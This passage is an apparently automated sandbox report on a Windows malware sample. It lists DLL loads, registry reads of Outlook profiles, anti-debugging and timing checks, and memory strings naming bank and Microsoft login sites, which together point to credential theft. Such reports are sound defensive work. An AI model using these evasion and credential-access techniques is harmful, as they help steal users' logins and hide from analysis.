                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\BalphRTkPS.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: BalphRTkPS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BalphRTkPS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BalphRTkPS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: ieUnAtt.pdbGCTL source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ikSQhwOmrrnfH.exe, 00000007.00000002.4011664684.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4011666816.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BalphRTkPS.exe, BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pldkV.pdb source: BalphRTkPS.exe
                Source: Binary string: pldkV.pdbSHA256K source: BalphRTkPS.exe
                Source: BalphRTkPS.exe Static PE information: 0xA5522322 [Thu Nov 22 02:59:46 2057 UTC]
                Source: BalphRTkPS.exe Static PE information: section name: .text entropy: 7.253794404065134
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: BalphRTkPS.exe PID: 2064, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: 12A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: 3040000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: 1520000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: 95A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: A5A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: A7C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Memory allocated: B7C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: 6_2_0177096E rdtsc 6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: 0_2_074EBD19 sldt word ptr [eax] 0_2_074EBD19
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BalphRTkPS.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exe API coverage: 3.0 %
                Source: C:\Users\user\Desktop\BalphRTkPS.exe TID: 5504 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 5696 Thread sleep count: 42 > 30
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 5696 Thread sleep time: -84000s >= -30000s
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe TID: 612 Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe TID: 612 Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02D8CC50 FindFirstFileW,FindNextFileW,FindClose, 8_2_02D8CC50
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 086604I_P.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000310A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%)
                Source: 086604I_P.8.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: 086604I_P.8.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: firefox.exe, 0000000B.00000002.2793679245.000001880B0FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHHU(P
                Source: 086604I_P.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 086604I_P.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 086604I_P.8.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 086604I_P.8.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 086604I_P.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 086604I_P.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 086604I_P.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 086604I_P.8.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4013033330.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: 086604I_P.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 086604I_P.8.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 086604I_P.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 086604I_P.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 086604I_P.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: 6_2_0177096E rdtsc 6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: 6_2_00417D83 LdrLoadDll, 6_2_00417D83
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E53E mov eax, dword ptr fs:[00000030h]6_2_0175E53E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6500 mov eax, dword ptr fs:[00000030h]6_2_017C6500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804500 mov eax, dword ptr fs:[00000030h]6_2_01804500
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E5E7 mov eax, dword ptr fs:[00000030h]6_2_0175E5E7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017325E0 mov eax, dword ptr fs:[00000030h]6_2_017325E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C5ED mov eax, dword ptr fs:[00000030h]6_2_0176C5ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C5ED mov eax, dword ptr fs:[00000030h]6_2_0176C5ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017365D0 mov eax, dword ptr fs:[00000030h]6_2_017365D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A5D0 mov eax, dword ptr fs:[00000030h]6_2_0176A5D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A5D0 mov eax, dword ptr fs:[00000030h]6_2_0176A5D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E5CF mov eax, dword ptr fs:[00000030h]6_2_0176E5CF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E5CF mov eax, dword ptr fs:[00000030h]6_2_0176E5CF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017545B1 mov eax, dword ptr fs:[00000030h]6_2_017545B1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017545B1 mov eax, dword ptr fs:[00000030h]6_2_017545B1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B05A7 mov eax, dword ptr fs:[00000030h]6_2_017B05A7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E59C mov eax, dword ptr fs:[00000030h]6_2_0176E59C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732582 mov eax, dword ptr fs:[00000030h]6_2_01732582
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01732582 mov ecx, dword ptr fs:[00000030h]6_2_01732582
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01764588 mov eax, dword ptr fs:[00000030h]6_2_01764588
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175A470 mov eax, dword ptr fs:[00000030h]6_2_0175A470
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC460 mov ecx, dword ptr fs:[00000030h]6_2_017BC460
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172645D mov eax, dword ptr fs:[00000030h]6_2_0172645D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175245A mov eax, dword ptr fs:[00000030h]6_2_0175245A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176E443 mov eax, dword ptr fs:[00000030h]6_2_0176E443
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A430 mov eax, dword ptr fs:[00000030h]6_2_0176A430
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172E420 mov eax, dword ptr fs:[00000030h]6_2_0172E420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172C427 mov eax, dword ptr fs:[00000030h]6_2_0172C427
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B6420 mov eax, dword ptr fs:[00000030h]6_2_017B6420
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768402 mov eax, dword ptr fs:[00000030h]6_2_01768402
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017304E5 mov ecx, dword ptr fs:[00000030h]6_2_017304E5
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017644B0 mov ecx, dword ptr fs:[00000030h]6_2_017644B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BA4B0 mov eax, dword ptr fs:[00000030h]6_2_017BA4B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017364AB mov eax, dword ptr fs:[00000030h]6_2_017364AB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738770 mov eax, dword ptr fs:[00000030h]6_2_01738770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740770 mov eax, dword ptr fs:[00000030h]6_2_01740770
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730750 mov eax, dword ptr fs:[00000030h]6_2_01730750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE75D mov eax, dword ptr fs:[00000030h]6_2_017BE75D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772750 mov eax, dword ptr fs:[00000030h]6_2_01772750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772750 mov eax, dword ptr fs:[00000030h]6_2_01772750
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B4755 mov eax, dword ptr fs:[00000030h]6_2_017B4755
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov esi, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov eax, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176674D mov eax, dword ptr fs:[00000030h]6_2_0176674D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov eax, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov ecx, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176273C mov eax, dword ptr fs:[00000030h]6_2_0176273C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AC730 mov eax, dword ptr fs:[00000030h]6_2_017AC730
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C720 mov eax, dword ptr fs:[00000030h]6_2_0176C720
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C720 mov eax, dword ptr fs:[00000030h]6_2_0176C720
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730710 mov eax, dword ptr fs:[00000030h]6_2_01730710
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760710 mov eax, dword ptr fs:[00000030h]6_2_01760710
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C700 mov eax, dword ptr fs:[00000030h]6_2_0176C700
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017347FB mov eax, dword ptr fs:[00000030h]6_2_017347FB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017347FB mov eax, dword ptr fs:[00000030h]6_2_017347FB
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017527ED mov eax, dword ptr fs:[00000030h]6_2_017527ED
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE7E1 mov eax, dword ptr fs:[00000030h]6_2_017BE7E1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173C7C0 mov eax, dword ptr fs:[00000030h]6_2_0173C7C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B07C3 mov eax, dword ptr fs:[00000030h]6_2_017B07C3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017307AF mov eax, dword ptr fs:[00000030h]6_2_017307AF
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D678E mov eax, dword ptr fs:[00000030h]6_2_017D678E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01762674 mov eax, dword ptr fs:[00000030h]6_2_01762674
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F866E mov eax, dword ptr fs:[00000030h]6_2_017F866E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017F866E mov eax, dword ptr fs:[00000030h]6_2_017F866E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A660 mov eax, dword ptr fs:[00000030h]6_2_0176A660
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A660 mov eax, dword ptr fs:[00000030h]6_2_0176A660
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174C640 mov eax, dword ptr fs:[00000030h]6_2_0174C640
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174E627 mov eax, dword ptr fs:[00000030h]6_2_0174E627
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01766620 mov eax, dword ptr fs:[00000030h]6_2_01766620
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768620 mov eax, dword ptr fs:[00000030h]6_2_01768620
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173262C mov eax, dword ptr fs:[00000030h]6_2_0173262C
